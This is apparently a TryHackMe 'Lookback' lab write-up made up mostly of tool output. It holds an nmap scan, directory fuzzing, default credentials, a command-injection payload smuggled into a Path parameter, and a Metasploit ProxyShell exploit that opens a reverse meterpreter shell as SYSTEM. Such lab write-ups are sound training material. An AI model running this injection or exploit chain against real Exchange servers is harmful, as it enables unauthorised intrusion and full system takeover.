TryHackMe Lookback
nmap
nmap -sV -sC -T4 -p- 10.10.69.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-09 15:12 EST
Nmap scan report for 10.10.69.162
Host is up (0.092s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
443/tcp open ssl/https
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Not valid before: 2023-01-25T21:34:02
|_Not valid after: 2028-01-25T21:34:02
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Not valid before: 2024-02-08T19:18:53
|_Not valid after: 2024-08-09T19:18:53
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.18 seconds
ffuf
ffuf -u http://win-12ouo7a66m7.thm.local/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://win-12ouo7a66m7.thm.local/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
test [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 157ms]
ecp [Status: 302, Size: 233, Words: 6, Lines: 4, Duration: 73ms]
:: Progress: [26584/26584] :: Job [1/1] :: 581 req/sec :: Duration: [0:00:50] :: Errors: 2 ::
test endpoint credentials admin/admin https://win-12ouo7a66m7.thm.local/test/
Exploitation
The Path parameter is vulnerable to RCE, so the flag can be read easily
Privilege escalation
There is a TODO file on desktop. payload:
BitlockerActiveMonitoringLogs') ; type C:\Users\dev\Desktop\TODO.txt #('
containing this text "Install the Security Update for MS Exchange [TO BE DONE]" and several users including dev-infrastracture-team@thm.local
msfconsole
msf6 > search exchange Proxy
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/exchange_proxylogon_collector 2021-03-02 normal No Microsoft Exchange ProxyLogon Collector
1 exploit/windows/http/exchange_proxylogon_rce 2021-03-02 excellent Yes Microsoft Exchange ProxyLogon RCE
2 auxiliary/scanner/http/exchange_proxylogon 2021-03-02 normal No Microsoft Exchange ProxyLogon Scanner
3 exploit/windows/http/exchange_proxynotshell_rce 2022-09-28 excellent Yes Microsoft Exchange ProxyNotShell RCE
4 exploit/windows/http/exchange_proxyshell_rce 2021-04-06 excellent Yes Microsoft Exchange ProxyShell RCE
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/http/exchange_proxyshell_rce
msf6 > use 4
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOST 10.10.182.96
msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 10.9.191.227
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL dev-infrastracture-team@thm.local
EMAIL => dev-infrastracture-team@thm.local
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
[*] Started reverse TCP handler on 10.10.182.96:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-12ouo7a66m7.thm.local
[*] Assigning the 'Mailbox Import Export' role via dev-infrastracture-team@thm.local
[+] Successfully assigned the 'Mailbox Import Export' role
[+] Proceeding with SID: S-1-5-21-2402911436-1669601961-3356949615-1144 (dev-infrastracture-team@thm.local)
[*] Saving a draft email with subject 'EZdJFmHYi83' containing the attachment with the embedded webshell
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\WQk02Ek1q7zc.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200774 bytes) to 10.10.182.96
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\WQk02Ek1q7zc.aspx
[*] Meterpreter session 1 opened (10.9.191.227 :4444 -> 10.10.182.96:10807) at 2024-02-09 03:44:55 +0200
[*] Removing the mailbox export request
[*] Removing the draft email
meterpreter > shell
Process 14256 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
Last updated